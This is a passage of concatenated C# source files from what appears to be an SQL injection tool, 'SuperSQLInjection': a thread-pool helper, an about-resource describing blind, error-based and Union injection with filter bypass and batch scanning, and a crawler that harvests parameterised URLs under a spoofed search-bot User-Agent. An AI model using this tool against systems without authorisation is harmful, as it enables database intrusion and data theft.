132 | /// Returns the exception if occured otherwise returns null.
133 | /// This value is valid only after the work item completed,
134 | /// before that it is always null.
135 | ///
136 | public object Exception
137 | {
138 | get { return _workItem._exception; }
139 | }
140 |
141 | #endregion
142 |
143 | #region IInternalWorkItemResult Members
144 |
145 | public event WorkItemStateCallback OnWorkItemStarted
146 | {
147 | add
148 | {
149 | _workItem.OnWorkItemStarted += value;
150 | }
151 | remove
152 | {
153 | _workItem.OnWorkItemStarted -= value;
154 | }
155 | }
156 |
157 |
158 | public event WorkItemStateCallback OnWorkItemCompleted
159 | {
160 | add
161 | {
162 | _workItem.OnWorkItemCompleted += value;
163 | }
164 | remove
165 | {
166 | _workItem.OnWorkItemCompleted -= value;
167 | }
168 | }
169 |
170 | #endregion
171 |
172 | #region IInternalWorkItemResult Members
173 |
174 | public IWorkItemResult GetWorkItemResult()
175 | {
176 | return this;
177 | }
178 |
179 | public IWorkItemResult GetWorkItemResultT()
180 | {
181 | return new WorkItemResultTWrapper(this);
182 | }
183 |
184 | #endregion
185 | }
186 |
187 | #endregion
188 |
189 | }
190 | }
191 |
--------------------------------------------------------------------------------
/SuperSQLInjection/about.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 | 超级SQL注入工具
122 | 说明:
123 | 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具。
124 | 支持自动识别SQL注入,并自动配置,如程序无法自动识别,还可人工干预识别注入,并标记注入位置。
125 | 支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。
126 | 支持Bool型盲注、错误显示注入、Union注入。
127 | 支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。
128 | 支持简单的SQL注入绕过,可灵活进行字符替换绕过注入防护。
129 | 支持批量爬行扫描SQL注入或导入连接,批量探测是否可以注入。
130 | 本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。不适合新手人员使用,谢谢!
131 | 工具特点:
132 | 1.支持任意地点出现的任意SQL注入
133 | 2.支持全自动识别注入标记,也可人工识别注入并标记。
134 | 3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。
135 | 4.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。
136 | 5.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
137 | 官网:www.shack2.org
138 |
139 |
--------------------------------------------------------------------------------
/SuperSQLInjection/scan/Spider.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using SuperSQLInjection.model;
5 | using SuperSQLInjection.tools;
6 | using tools;
7 | using model;
8 | using System.Text.RegularExpressions;
9 | using System.Threading;
10 | using System.Collections;
11 |
12 | namespace SuperSQLInjection.scan
13 | {
14 | class Spider
15 | {
16 |
17 | public List AllURL = new List();
18 | public List AllNoParamaValURL = new List();//用于去掉相似URL
19 | public static Config config=null;
20 | public static String reqestGetTemplate = "GET {url} HTTP/1.1\r\nUser-Agent: BaiduSpider\r\nAccept-Encoding: gzip, deflate\r\nHost: {host}";
21 | public static String reqestPOSTTemplate = "POST {url} HTTP/1.1\r\nUser-Agent: BaiduSpider\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 5\r\nHost: {host}\r\n\r\n{data}";
22 | public void findLinks(String url)
23 | {
24 | try
25 | {
26 | if (url.IndexOf("https") != -1)
27 | {
28 | config.useSSL = true;
29 | }
30 | else {
31 | config.useSSL = false;
32 | }
33 | ServerInfo sever = URLTools.getHostAndPathQueryByURL(url);
34 | Uri uri = new Uri(url);
35 | String crequest = reqestGetTemplate.Replace("{url}", uri.PathAndQuery).Replace("{host}", uri.Host + ":" + uri.Port);
36 |
37 | String rootPath = "";
38 | if (("http".Equals(uri.Scheme) && uri.Port == 80) || ("https".Equals(uri.Scheme) && uri.Port == 443))
39 | {
40 |
41 | rootPath = uri.Scheme + "://" + uri.Host;
42 | }
43 | else
44 | {
45 | rootPath = uri.Scheme + "://" + uri.Host + ":" + uri.Port;
46 | }
47 | ServerInfo urlServer = sendHTTP(url.StartsWith("https",StringComparison.OrdinalIgnoreCase),sever.host, sever.port, crequest);
48 |
49 | String rootHost = Tools.getRootDomain(uri.Host);
50 | //当前URL目录
51 | String cpath = rootPath + Tools.getCurrentPath(uri.AbsolutePath);
52 | int count = 0;
53 | if (urlServer != null)
54 | {
55 | //抓取连接+*
56 | //Thread.Sleep(200);
57 | Match m;
58 | Regex reg = new Regex("href=(['\"\\S]?)(?[^'\"]*)", RegexOptions.IgnoreCase);
59 | if (urlServer.code == 200 && urlServer.body.Length > 10)
60 | {
61 | for (m = reg.Match(urlServer.body); m.Success; m = m.NextMatch())
62 | {
63 | String curl = m.Groups["href"].Value;
64 | if (!String.IsNullOrEmpty(curl))
65 | {
66 | if (!curl.Contains("?") || !curl.Contains("="))
67 | {
68 | continue;
69 | }
70 |
71 | if (curl.ToLower().Contains("javascript:"))
72 | {
73 | continue;
74 | }
75 | if (!curl.Contains(".") && !curl.Contains("/"))
76 | {
77 | continue;
78 | }
79 |
80 | curl = curl.Replace("&", "&");
81 | if (curl.StartsWith("//"))
82 | {
83 |
84 | curl = "http:" + curl;
85 |
86 | }
87 | else if (curl.StartsWith("/"))
88 | {
89 |
90 | curl = rootPath + curl;
91 |
92 | }
93 | else if (curl.IndexOf("http://") == -1 && curl.IndexOf("www.") == -1 && curl.IndexOf(".com") == -1 && curl.IndexOf(".cn") == -1 && curl.IndexOf(".tw") == -1 && curl.IndexOf(".jp") == -1)
94 | {
95 | //相对路径
96 |
97 | curl = cpath + curl;
98 | }
99 |
100 | if (curl.IndexOf(">")!=-1) {
101 | curl = curl.Substring(0, curl.IndexOf(">"));
102 | }
103 |
104 | if (curl.Contains(rootHost))
105 | {
106 | //过滤相似URL
107 | String noValURL = Tools.clearURLParams(curl);
108 | try
109 | {
110 | Uri cu = new Uri(curl);
111 | String cupath = cu.AbsolutePath;
112 | if (cupath.EndsWith(".css") || cupath.EndsWith(".js") || cupath.EndsWith(".jpg") || cupath.EndsWith(".png") || cupath.EndsWith(".ico") || cupath.EndsWith(".gif"))
113 | {
114 | continue;
115 | }
116 | if (!AllURL.Contains(curl) && !AllNoParamaValURL.Contains(noValURL)&&AllURL.Count